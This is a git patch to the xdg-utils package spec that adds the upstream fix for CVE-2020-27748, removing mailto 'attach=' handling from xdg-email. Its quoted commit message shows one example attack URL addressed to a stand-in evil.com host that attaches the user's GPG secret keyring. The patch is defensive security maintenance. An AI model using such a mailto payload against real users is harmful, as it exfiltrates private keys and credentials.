From 512455f3bb937e4f8b0d5a464049cd663aa24609 Mon Sep 17 00:00:00 2001 From: jackie_wu Date: Tue, 15 Jun 2021 10:52:45 +0800 Subject: [PATCH] fix CVE-2020-27748 --- CVE-2020-27748.patch | 55 ++++++++++++++++++++++++++++++++++++++++++++ xdg-utils.spec | 6 ++++- 2 files changed, 60 insertions(+), 1 deletion(-) create mode 100644 CVE-2020-27748.patch diff --git a/CVE-2020-27748.patch b/CVE-2020-27748.patch new file mode 100644 index 0000000..de04492 --- /dev/null +++ b/CVE-2020-27748.patch @@ -0,0 +1,55 @@ +From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= +Date: Tue, 18 Aug 2020 16:52:24 +0100 +Subject: [PATCH] xdg-email: remove attachment handling from mailto +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +This allows attacker to extract secrets from users: + +mailto:sid@evil.com?attach=/.gnupg/secring.gpg + +See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 +and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177 + +Signed-off-by: Jörg Thalheim +--- + scripts/xdg-email.in | 7 +------ + 1 file changed, 1 insertion(+), 6 deletions(-) + +diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in +index 6db58ad..5d2f4f3 100644 +--- a/scripts/xdg-email.in ++++ b/scripts/xdg-email.in +@@ -32,7 +32,7 @@ _USAGE + + run_thunderbird() + { +- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH ++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY + THUNDERBIRD="$1" + MAILTO=$(echo "$2" | sed 's/^mailto://') + echo "$MAILTO" | grep -qs "^?" +@@ -48,7 +48,6 @@ run_thunderbird() + BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')) + SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1) + BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1) +- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//')) + + if [ -z "$TO" ] ; then + NEWMAILTO= +@@ -68,10 +67,6 @@ run_thunderbird() + NEWMAILTO="${NEWMAILTO},$BODY" + fi + +- if [ -n "$ATTACH" ] ; then +- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'" +- fi +- + NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//') + DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\"" + "$THUNDERBIRD" -compose "$NEWMAILTO" +-- +GitLab + diff --git a/xdg-utils.spec b/xdg-utils.spec index 1bcbc1a..78cc2ce 100644 --- a/xdg-utils.spec +++ b/xdg-utils.spec @@ -1,6 +1,6 @@ Name: xdg-utils Version: 1.1.3 -Release: 4 +Release: 5 Summary: A set of easily desktop environment integration tools License: MIT URL: http://portland.freedesktop.org/ @@ -9,6 +9,7 @@ Source1: xdg-utils-git_checkout.sh Patch0000: 0001-open-for-post-1.1.3-development.patch Patch0001: 0002-xdg-open-better-pcmanfm-check-BR106636-BR106161.patch +Patch0002: CVE-2020-27748.patch BuildArch: noarch @@ -54,5 +55,8 @@ Help document for th xdg-utils package. %{_mandir}/man1/xdg-* %changelog +* Tue Jun 15 2021 wutao - 1.1.3-5 +- fix CVE-2020-27748 + * Fri Oct 25 2019 Lijin Yang - 1.1.3-4 - Package init